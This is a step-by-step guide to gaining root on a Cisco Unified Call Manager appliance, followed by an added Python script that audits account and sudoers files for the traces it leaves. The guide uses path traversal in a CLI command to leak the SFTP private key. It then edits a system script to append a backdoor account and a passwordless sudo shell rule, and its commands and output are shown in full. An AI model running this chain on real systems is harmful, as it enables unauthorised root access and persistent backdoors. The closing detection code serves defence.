Jailbreak Cisco Unified Call Manager
- Connect to the administrator CLI using SSH
- Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user:
    admin:file dump sftpdetails ../.ssh/id_dsa
    -----BEGIN DSA PRIVATE KEY-----
    [key material omitted]
    -----END DSA PRIVATE KEY-----
- Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example.
    C:\>copy con c:\temp\id.ots
    -----BEGIN DSA PRIVATE KEY-----
    [key material omitted]
    -----END DSA PRIVATE KEY-----
    ^Z
            1 file(s) copied.
- If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using:
    C:\> puttygen c:\TEMP\id.ots
Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.
- Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team:
    C:\>psftp -2 -i c:\TEMP\id.ppk [email protected]
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp>
- Get the file sftp_connect.sh:
    psftp> get sftp_connect.sh
    remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
    psftp>exit
- You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task.
    chattr -i /etc/passwd
    chattr -i /etc/shadow
    echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
    echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
    echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
    chattr +i /etc/passwd
    chattr +i /etc/shadow
- Now we connect using the sftpuser again and replace the file sftp_connect.sh:
    C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk [email protected]
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp> del sftp_connect.sh
    rm /home/sftpuser/sftp_connect.sh: OK
    psftp> put sftp_connect.sh
    local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
    psftp> chmod 555 sftp_connect.sh
    /home/sftpuser/sftp_connect.sh: 0644 -> 0555
    psftp>exit
- Back in the CUCM administrator CLI, we execute the command file get tftp os7920.txt to trigger our enhanced script. Yes, the command line says TFTP, not SFTP, that’s correct. Never mind. It doesn’t actually matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question.
    admin:file get tftp os7920.txt
    Please wait while the system is gathering files info ...done.
    Sub-directories were not traversed.
    Number of files affected: 1
    Total size in Bytes: 22
    Total size in Kbytes: 0.021484375
    Would you like to proceed [y/n]? y
    SFTP server IP: doesNotMatter
    SFTP server port [22]:
    User ID: SoonToBeRoot
    Password: ***
    Download directory: InYourFace
    Could not connect to host doesNotMatter on port 22.
    Please verify SFTP settings.
    admin:
- Finally, you can connect to your CUCM using SSH with the user name jail and the password break, and elevate your privileges by using sudo /bin/bash:
    login as: jail
    [email protected]'s password:
    -bash-3.00$ sudo /bin/bash
    bash-3.00# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    bash-3.00#
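
The modification above leaves three artifacts on the appliance: an extra shell account in /etc/passwd, a NOPASSWD shell rule in /etc/sudoers, and lines in sftp_connect.sh that clear the immutable flag on, or append to, the account files. The Python check below is an added example for auditing exported copies of those files; it is not part of the original page or of any Cisco tooling. The account allowlist, function names and sample data are assumptions constructed for illustration.

```python
import re

# Assumption: site baseline of accounts allowed an interactive shell.
ALLOWED_SHELL_USERS = {"root", "admin"}
SHELLS = {"/bin/bash", "/bin/sh"}
PROTECTED = r"/etc/(?:passwd|shadow|sudoers)"

def audit_passwd(text):
    """Flag extra UID 0 accounts and unlisted accounts with a login shell."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid, shell = fields[0], fields[2], fields[6]
        if uid == "0" and name != "root":
            findings.append(f"passwd: extra uid 0 account {name}")
        elif shell in SHELLS and name not in ALLOWED_SHELL_USERS:
            findings.append(f"passwd: unexpected shell account {name}")
    return findings

def audit_sudoers(text):
    """Flag NOPASSWD rules that grant a shell (or ALL)."""
    findings = []
    for line in text.splitlines():
        m = re.match(r"(\S+)\s+\S+\s*=\s*\([^)]*\)\s*NOPASSWD:\s*(.+)", line.strip())
        cmds = {c.strip() for c in m.group(2).split(",")} if m else set()
        if cmds & (SHELLS | {"ALL"}):
            findings.append(f"sudoers: passwordless shell rule for {m.group(1)}")
    return findings

def audit_script(text):
    """Flag lines that clear the immutable bit on, or write to, account files."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if re.search(rf"chattr\s+-\S*i\S*\s+{PROTECTED}", line):
            findings.append(f"script:{n}: immutable flag cleared")
        elif re.search(rf">>?\s*{PROTECTED}", line):
            findings.append(f"script:{n}: write to protected file")
    return findings

# Constructed samples modelled on the lines this page adds; not real system files.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\njail:x:1337:1337::/tmp:/bin/bash\n"
SAMPLE_SUDOERS = "root ALL=(ALL) ALL\njail ALL=(root) NOPASSWD: /bin/bash\n"
SAMPLE_SCRIPT = "#!/bin/sh\nchattr -i /etc/passwd\necho 'x' >> /etc/sudoers\n"

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD) + audit_sudoers(SAMPLE_SUDOERS) + audit_script(SAMPLE_SCRIPT):
        print(f)
```

Comparing a hash of sftp_connect.sh against a known-good copy from the same software version catches changes that these patterns do not.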